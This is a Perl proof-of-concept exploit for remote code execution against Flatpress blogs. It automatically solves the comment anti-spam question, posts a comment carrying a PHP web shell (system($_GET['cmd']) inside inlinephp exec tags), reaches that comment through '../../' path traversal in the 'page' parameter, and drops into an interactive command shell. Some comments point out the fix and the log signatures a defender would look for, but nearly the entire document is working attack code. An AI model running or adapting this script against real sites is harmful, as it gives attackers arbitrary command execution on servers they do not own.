#!/usr/bin/perl
# Flatpress remote code execution PoC
# Blended threat, executes code injected into comment
# by loading comment as a page through directory traversal
# Written by @Wireghoul - justanotherhacker.com
use strict;
use warnings;
use LWP::UserAgent;
# Print the banner, then bail out with usage text when no target URL was given.
banner();
usage() unless $ARGV[0];

# Random marker used as the comment author name so the posted comment can be
# found again later on the page.
my $injid = sprintf 'Spl0ited%d', int rand 9999;

# HTTP client: 10 s timeout, proxy settings taken from the environment, and a
# cookie jar whose path is relative to the current working directory.
my $ua = LWP::UserAgent->new(timeout => 10);
$ua->env_proxy;
$ua->cookie_jar({ file => "tmp/flatpress-rce.txt" });
# Print the two-line program banner to STDOUT. Takes no arguments and
# returns nothing meaningful.
sub banner {
    my $title  = "Flatpress remote code execution PoC by \@Wireghoul";
    my $footer = "=======================[ justanotherhacker.com]==";
    print "\n", $title, "\n", $footer, "\n";
    return;
}
# Print the usage line (program name taken from $0) and terminate the
# process with exit status 0. Never returns.
sub usage {
    my $program = $0;
    print "Usage: $program <url>\n";
    exit;
}
# Step 1: probe for the inlinephp plugin file. Only the HTTP status is
# checked, so this tells whether the file is served, not whether the plugin
# is enabled. A miss is reported but is not fatal: execution continues.
my $response = $ua->get("$ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php");
if (!$response->is_success) {
print "[-] Inline PHP plugin not found at $ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php\n";
} else {
print "[+] Inline PHP plugin found, hopefully it is enabled!\n";
}
# Step 2: locate an entry with a comment form. The front page is fetched and
# the first "...x=entry:entry...;comments:1#comments" link is taken as the
# target; the capture from this match becomes $cmntlink.
$response = $ua->get($ARGV[0]);
if ($response->is_success) {
if ($response->decoded_content =~ /(http.*?x=entry:entry.*?;comments:1#comments)/) {
my $cmntlink = $1;
print "[+] Found comment link: $cmntlink\n";
# Step 3: answer the anti-spam question. It is expected as
# "<strong>N plus M ? (*)"; the page is reloaded until that shape appears
# and the sum is computed. There is no retry cap, so a form that never
# matches keeps this loop running indefinitely.
my $aaspam = 0; # Can't be bothered solving easy captchas, just reload page until we get one we like
while ($aaspam == 0) {
$response = $ua->get($cmntlink);
if ($response->decoded_content =~ /<strong>(\d+) plus (\d+) \? \(\*\)/) {
$aaspam = $1+$2;
print "[+] Defeated antispam $1 + $2 = $aaspam\n";
} else {
# A failed match leaves $1 untouched, so if this pattern also misses the
# message below prints the previous capture (the comment link), not the
# question on the page.
$response->decoded_content =~ m/<strong>(.*) \? \(\*\)/;
print "[*] Unknown antispam: $1 ... retrying\n";
}
}
# Step 4: post the comment. The body is an inlinephp [exec]...[/exec] tag
# wrapped in SHELL/LLEHS markers so its output can be cut out later. From
# the defender's side this is the durable artifact: a stored comment whose
# content field contains [exec] tags.
$response = $ua->post(
$cmntlink."form",
Content => {
'name' => $injid,
'email' => '',
'url' => '',
'aaspam' => $aaspam,
'content' => "SHELL[exec]system(\$_GET['cmd']);[/exec]LLEHS",
'submit' => 'Add',
}
);
# Step 5: re-read the comment page and confirm the comment carrying the
# random author name ($injid) was stored.
$response = $ua->get($cmntlink);
# Find link to injected content, then execute pseudo shell in loop
my @cmnts = split (/<li id="comment/, $response->decoded_content);
my @injected = grep /$injid/, @cmnts;
# If nothing matched, $injected[0] is undef: under "use warnings" this emits
# an uninitialized-value warning and falls through to the else branch.
if ($injected[0] =~ /$injid/) {
print "[+] Injection ($injid) successful\n";
# The comment anchor is split into the URL prefix, three two-digit groups
# plus a sequence number (presumably YY/MM/DD-seq) and the comment id; these
# are rebuilt into a content-directory path passed to the "page=" parameter
# with a "../../" prefix. That traversal out of the expected directory is
# the weakness the PoC depends on: the application-side fix is to
# canonicalize "page" and reject path separators, and "page" values
# containing "../" are the signature to look for in access logs. The match
# is unchecked; if it fails the captures are undef and $shell is malformed.
$injected[0] =~ m/(http.*?)x=entry:entry(\d\d)(\d\d)(\d\d-\d+);comments:1#comment(\d+-\d+)/;
my $shell="$1page=../../content/$2/$3/entry$2$3$4/comments/comment$5";
print "[*] Dropping into shell, type exit to exit\n";
# Step 6: interactive loop. $line keeps its trailing newline (no chomp):
# /^exit$/ still matches because $ allows a final newline, but that newline
# is also sent inside the cmd= parameter unencoded. At EOF on STDIN $line is
# undef, which never matches "exit", so the loop does not end on Ctrl-D.
# Output is whatever sits between the SHELL/LLEHS markers; if that match
# fails $1 is stale or undef and the print reports the previous capture.
my $line='';
while (1) {
print '$';
$line=<STDIN>;
if ($line =~ /^exit$/) { exit; };
my $output=$ua->get("$shell&cmd=$line");
$output->decoded_content =~ /SHELL(.*)LLEHS/ms;
my $clean = $1; $clean =~ s/<br \/>//g;
print "$clean\n";
}
} else {
# Unlike the other status lines this one carries no trailing newline.
print '[-] Unable to identify the injection point';
}
} else {
print "[-] Comment link not found\n";
}
} else {
# Front page fetch failed: abort with the HTTP status line.
die $response->status_line;
}